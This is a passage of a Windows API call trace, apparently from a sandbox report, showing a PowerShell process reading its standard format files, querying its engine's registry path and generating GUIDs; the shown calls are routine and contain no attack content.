(hFile=0x350) returned 0x1 [0151.981] SetErrorMode (uMode=0x1) returned 0x1 [0151.981] GetFileType (hFile=0x350) returned 0x1 [0151.981] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.983] GetLastError () returned 0x0 [0151.983] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.984] GetLastError () returned 0x0 [0151.984] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.984] GetLastError () returned 0x0 [0151.984] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.984] GetLastError () returned 0x0 [0151.984] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.984] GetLastError () returned 0x0 [0151.984] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.984] GetLastError () returned 0x0 [0151.985] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.985] GetLastError () returned 0x0 [0151.985] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.985] GetLastError () returned 0x0 [0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.986] GetLastError () returned 0x0 [0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.986] GetLastError () returned 0x0 [0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.986] GetLastError () returned 0x0 [0151.986] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.986] GetLastError () returned 0x0 [0151.987] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.987] GetLastError () returned 0x0 [0151.987] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.987] GetLastError () returned 0x0 [0151.987] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.987] GetLastError () returned 0x0 [0151.987] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.987] GetLastError () returned 0x0 [0151.989] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.989] GetLastError () returned 0x0 [0151.989] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0xbce, lpOverlapped=0x0) returned 1 [0151.989] GetLastError () returned 0x0 [0151.989] ReadFile (in: hFile=0x350, lpBuffer=0x2e907d6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e907d6*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.989] GetLastError () returned 0x0 [0151.990] ReadFile (in: hFile=0x350, lpBuffer=0x2e91068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2e91068*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.990] GetLastError () returned 0x0 [0151.990] CloseHandle (hObject=0x350) returned 1 [0151.990] GetLastError () returned 0x0 [0151.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.990] GetLastError () returned 0x0 [0151.990] SetErrorMode (uMode=0x1) returned 0x1 [0151.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2eb2064 | out: lpFileInformation=0x2eb2064*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0151.990] GetLastError () returned 0x0 [0151.990] SetErrorMode (uMode=0x1) returned 0x1 [0151.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.990] GetLastError () returned 0x0 [0151.990] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x350) returned 0x0 [0151.991] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.991] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.991] RegCloseKey (hKey=0x350) returned 0x0 [0151.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.991] GetLastError () returned 0x0 [0151.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.991] GetLastError () returned 0x0 [0151.992] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x708f2212, Data2=0x215f, Data3=0x4ac8, Data4=([0]=0x90, [1]=0x15, [2]=0x63, [3]=0x97, [4]=0xc7, [5]=0xf7, [6]=0xd, [7]=0x50))) returned 0x0 [0151.992] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x91e724a1, Data2=0xd1d2, Data3=0x4978, Data4=([0]=0x8f, [1]=0x51, [2]=0x92, [3]=0xc8, [4]=0x5d, [5]=0xc5, [6]=0x6e, [7]=0x9))) returned 0x0 [0151.992] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe0ae5308, Data2=0x84b3, Data3=0x4adf, Data4=([0]=0x95, [1]=0xa7, [2]=0xc3, [3]=0x5a, [4]=0x35, [5]=0x16, [6]=0xb4, [7]=0x11))) returned 0x0 [0151.992] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x86976f75, Data2=0xd7bd, Data3=0x471e, Data4=([0]=0x86, [1]=0xe6, [2]=0xa5, [3]=0xd4, [4]=0xbe, [5]=0x4c, [6]=0xe7, [7]=0xc9))) returned 0x0 [0151.992] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xab6a56d4, Data2=0xf3e1, Data3=0x48e7, Data4=([0]=0x80, [1]=0x6, [2]=0xf1, [3]=0x25, [4]=0x59, [5]=0x8b, [6]=0x4c, [7]=0xfe))) returned 0x0 [0151.993] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xbcdbd1f0, Data2=0x2f51, Data3=0x4d14, Data4=([0]=0x9d, [1]=0x56, [2]=0x55, [3]=0x53, [4]=0x8b, [5]=0x9b, [6]=0x94, [7]=0x49))) returned 0x0 [0151.993] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.993] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x475bfa3e, Data2=0x33e6, Data3=0x49b6, Data4=([0]=0x87, [1]=0xbb, [2]=0x4e, [3]=0x52, [4]=0x86, [5]=0xe8, [6]=0xcd, [7]=0x97))) returned 0x0 [0151.993] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.993] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.993] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x9e20bc5b, Data2=0xc0fc, Data3=0x4207, Data4=([0]=0x96, [1]=0xd0, [2]=0xb4, [3]=0xe0, [4]=0x91, [5]=0xec, [6]=0xa3, [7]=0x68))) returned 0x0 [0151.993] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xb75abb84, Data2=0xdecd, Data3=0x44d6, Data4=([0]=0x84, [1]=0xc2, [2]=0x1c, [3]=0xe1, [4]=0xf5, [5]=0xed, [6]=0x10, [7]=0x6c))) returned 0x0 [0151.993] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x9fedba4b, Data2=0xa196, Data3=0x4898, Data4=([0]=0xb2, [1]=0x8a, [2]=0x8b, [3]=0x72, [4]=0xba, [5]=0xeb, [6]=0xf7, [7]=0x12))) returned 0x0 [0151.993] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x2073b3e2, Data2=0x9aa3, Data3=0x4f52, Data4=([0]=0xbb, [1]=0x96, [2]=0xd3, [3]=0x5d, [4]=0x49, [5]=0x9a, [6]=0x10, [7]=0x98))) returned 0x0 [0151.994] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.994] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe02a8bd3, Data2=0x3dae, Data3=0x480a, Data4=([0]=0xb7, [1]=0x8d, [2]=0xf9, [3]=0x1d, [4]=0xcd, [5]=0xfe, [6]=0x68, [7]=0x19))) returned 0x0 [0151.994] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.994] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.994] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xc5f3b574, Data2=0x7754, Data3=0x41d5, Data4=([0]=0xbe, [1]=0x59, [2]=0xb3, [3]=0xd7, [4]=0x7d, [5]=0xef, [6]=0x57, [7]=0x6a))) returned 0x0 [0151.995] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1945ac3c, Data2=0x14ae, Data3=0x4198, Data4=([0]=0x87, [1]=0xba, [2]=0xf1, [3]=0x56, [4]=0x85, [5]=0x8f, [6]=0xc0, [7]=0x99))) returned 0x0 [0151.995] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x31ea23e1, Data2=0x6d7, Data3=0x4425, Data4=([0]=0x95, [1]=0xb7, [2]=0x21, [3]=0xad, [4]=0x6d, [5]=0x79, [6]=0x72, [7]=0x5f))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x41c74af9, Data2=0xb76e, Data3=0x470a, Data4=([0]=0x89, [1]=0x2f, [2]=0x70, [3]=0x98, [4]=0xfc, [5]=0x6e, [6]=0x19, [7]=0x85))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xd38affd2, Data2=0x7b3, Data3=0x4b13, Data4=([0]=0x8b, [1]=0x91, [2]=0x3d, [3]=0x33, [4]=0xd2, [5]=0x16, [6]=0xc9, [7]=0x37))) returned 0x0 [0151.996] VirtualQuery (in: lpAddress=0x12d5a4, lpBuffer=0x12e5a4, dwLength=0x1c | out: lpBuffer=0x12e5a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xc6623c12, Data2=0x2ca5, Data3=0x45d9, Data4=([0]=0x9d, [1]=0x51, [2]=0x40, [3]=0xb0, [4]=0x2, [5]=0x97, [6]=0xdb, [7]=0xe))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x4cf3dbf1, Data2=0x2cdb, Data3=0x4696, Data4=([0]=0x9e, [1]=0x3c, [2]=0xb9, [3]=0x4b, [4]=0x34, [5]=0x2c, [6]=0x31, [7]=0xbf))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x70e59bca, Data2=0x58a3, Data3=0x4b8a, Data4=([0]=0xb8, [1]=0xf, [2]=0xa9, [3]=0x49, [4]=0x57, [5]=0x17, [6]=0xc7, [7]=0x59))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1c1b9105, Data2=0xc966, Data3=0x446b, Data4=([0]=0x9a, [1]=0xa5, [2]=0x1d, [3]=0xab, [4]=0x72, [5]=0x30, [6]=0x36, [7]=0x85))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe07b9434, Data2=0xcbe, Data3=0x4e1e, Data4=([0]=0xa1, [1]=0xe1, [2]=0xe1, [3]=0xdd, [4]=0xc1, [5]=0x13, [6]=0x2d, [7]=0xf2))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xb2b8581d, Data2=0xf715, Data3=0x4daf, Data4=([0]=0x99, [1]=0xdc, [2]=0x59, [3]=0x13, [4]=0x8, [5]=0xad, [6]=0xd2, [7]=0x68))) returned 0x0 [0151.996] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x6be43a36, Data2=0xec19, Data3=0x48af, Data4=([0]=0xaa, [1]=0x72, [2]=0x6e, [3]=0xf4, [4]=0xae, [5]=0x9d, [6]=0x75, [7]=0x6f))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xeed6c72a, Data2=0x93c0, Data3=0x485b, Data4=([0]=0x86, [1]=0xc8, [2]=0xce, [3]=0x99, [4]=0xcb, [5]=0x8c, [6]=0xbb, [7]=0xc8))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xbc72a1ea, Data2=0xc28c, Data3=0x4cd5, Data4=([0]=0x97, [1]=0x2e, [2]=0x5b, [3]=0x4f, [4]=0x5c, [5]=0xe7, [6]=0x8f, [7]=0xd0))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xc94d085b, Data2=0x7699, Data3=0x453c, Data4=([0]=0xbc, [1]=0xcb, [2]=0x46, [3]=0x39, [4]=0x2f, [5]=0xa2, [6]=0x8b, [7]=0xe3))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x29b5dc41, Data2=0x191c, Data3=0x42af, Data4=([0]=0xbd, [1]=0x6b, [2]=0x48, [3]=0x28, [4]=0xe0, [5]=0x41, [6]=0x2, [7]=0x5a))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x94f38a1f, Data2=0xee55, Data3=0x4665, Data4=([0]=0x93, [1]=0x57, [2]=0xd1, [3]=0xb3, [4]=0x87, [5]=0x35, [6]=0x33, [7]=0xba))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1230d78a, Data2=0xb86f, Data3=0x4e90, Data4=([0]=0xa9, [1]=0xb2, [2]=0xfd, [3]=0xe7, [4]=0x88, [5]=0xfd, [6]=0x5e, [7]=0x27))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x7e85770a, Data2=0x1e73, Data3=0x45fe, Data4=([0]=0xba, [1]=0xc3, [2]=0xe1, [3]=0x5c, [4]=0xf0, [5]=0xd1, [6]=0x7a, [7]=0x52))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x5334d1af, Data2=0xb8d1, Data3=0x4e58, Data4=([0]=0x8a, [1]=0x18, [2]=0xc8, [3]=0x17, [4]=0x4, [5]=0xb6, [6]=0x83, [7]=0x27))) returned 0x0 [0151.997] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x3c338b1a, Data2=0xcfc5, Data3=0x4fb4, Data4=([0]=0xb0, [1]=0x9d, [2]=0xd2, [3]=0x70, [4]=0x8d, [5]=0x82, [6]=0x58, [7]=0x2d))) returned 0x0 [0151.998] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xde502a13, Data2=0xfeff, Data3=0x405a, Data4=([0]=0x99, [1]=0x7a, [2]=0xe4, [3]=0x76, [4]=0x35, [5]=0xb, [6]=0x54, [7]=0xc4))) returned 0x0 [0151.998] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1dd289c0, Data2=0x387d, Data3=0x4de1, Data4=([0]=0xa2, [1]=0x2a, [2]=0x3e, [3]=0xbf, [4]=0x99, [5]=0x6d, [6]=0x70, [7]=0x72))) returned 0x0 [0151.998] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe6d1e885, Data2=0xd630, Data3=0x4c48, Data4=([0]=0x9b, [1]=0xdf, [2]=0xf3, [3]=0xc3, [4]=0x79, [5]=0xbf, [6]=0xbe, [7]=0x94))) returned 0x0 [0151.998] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.998] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.999] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.048] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa35a341a, Data2=0x53c7, Data3=0x4a83, Data4=([0]=0x93, [1]=0x84, [2]=0x60, [3]=0xeb, [4]=0xb7, [5]=0xf6, [6]=0xf7, [7]=0xf4))) returned 0x0 [0152.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.048] GetLastError () returned 0x0 [0152.048] SetErrorMode (uMode=0x1) returned 0x1 [0152.049] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0152.049] GetLastError () returned 0x0 [0152.049] GetFileType (hFile=0x350) returned 0x1 [0152.049] SetErrorMode (uMode=0x1) returned 0x1 [0152.049] GetFileType (hFile=0x350) returned 0x1 [0152.049] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.049] GetLastError () returned 0x0 [0152.049] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.049] GetLastError () returned 0x0 [0152.049] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.049] GetLastError () returned 0x0 [0152.049] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.050] GetLastError () returned 0x0 [0152.050] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.050] GetLastError () returned 0x0 [0152.050] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.050] GetLastError () returned 0x0 [0152.050] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x119, lpOverlapped=0x0) returned 1 [0152.050] GetLastError () returned 0x0 [0152.050] ReadFile (in: hFile=0x350, lpBuffer=0x2f4ef50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f4ef50*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.050] GetLastError () returned 0x0 [0152.050] CloseHandle (hObject=0x350) returned 1 [0152.050] GetLastError () returned 0x0 [0152.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.050] GetLastError () returned 0x0 [0152.050] SetErrorMode (uMode=0x1) returned 0x1 [0152.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" 